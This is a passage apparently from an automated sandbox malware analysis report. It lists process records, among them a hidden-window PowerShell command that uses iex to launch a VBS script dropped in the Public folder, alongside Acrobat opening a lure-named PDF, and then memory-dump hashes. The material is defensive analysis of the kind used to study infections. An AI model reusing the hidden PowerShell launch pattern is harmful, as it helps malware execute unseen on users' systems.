                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\j5mh76.vbs'"
                                                                                              Imagebase:0x7ff7be880000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:5
                                                                                              Start time:06:51:21
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
                                                                                              Imagebase:0x7ff686a00000
                                                                                              File size:5'641'176 bytes
                                                                                              MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:6
                                                                                              Start time:06:51:22
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                              Imagebase:0x7ff6413e0000
                                                                                              File size:3'581'912 bytes
                                                                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:7
                                                                                              Start time:06:51:22
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                              Imagebase:0x7ff7e52b0000
                                                                                              File size:55'320 bytes
                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:8
                                                                                              Start time:06:51:22
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1528,i,9795832297208486948,11593460872991007467,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                              Imagebase:0x7ff6413e0000
                                                                                              File size:3'581'912 bytes
                                                                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                                • Opcode Fuzzy Hash: 7e3be6aa928e55fbc239ff5b97b1bff6ff13355b3dfcb6edd1ad3a0b1d0a7754
                                                                                                • Instruction Fuzzy Hash: AC212332E1EA8A4FF399A76C185517466D2EF852A0F5800BBD21CC71D3EF2DAC05822D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2322071902.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ff848f20000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                                                                                                • Instruction ID: d725330ba92709bd9ebeb30e62369127f6c3244bce203fd248fe808a27b82538
                                                                                                • Opcode Fuzzy Hash: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                                                                                                • Instruction Fuzzy Hash: 7701677111CB0C4FD754EF0CE451AA5B7E0FB95364F10056EE58AC36A5D736E882CB46
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.2110523004.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ff848fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 353a1e8c7c012891626700c3e11971f4eb249b43683a36a576474a0eef84cd04
                                                                                                • Instruction ID: c4d224448ef5316cd81e5c43fa47fddd2de1bafe7bb702254a9b582406839941
                                                                                                • Opcode Fuzzy Hash: 353a1e8c7c012891626700c3e11971f4eb249b43683a36a576474a0eef84cd04
                                                                                                • Instruction Fuzzy Hash: 81D11231D1EA8A5FEB55EB2C58199B5BBA1EF06394F0801FED04DC71D3DB1CA8058365
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.2109723212.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ff848f10000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                • Instruction ID: 191617ceee889ec1b776a361fbb2d1250ce1ead809f4672e64413ffe75dfec08
                                                                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                • Instruction Fuzzy Hash: 7201677111CB0C4FDB44EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45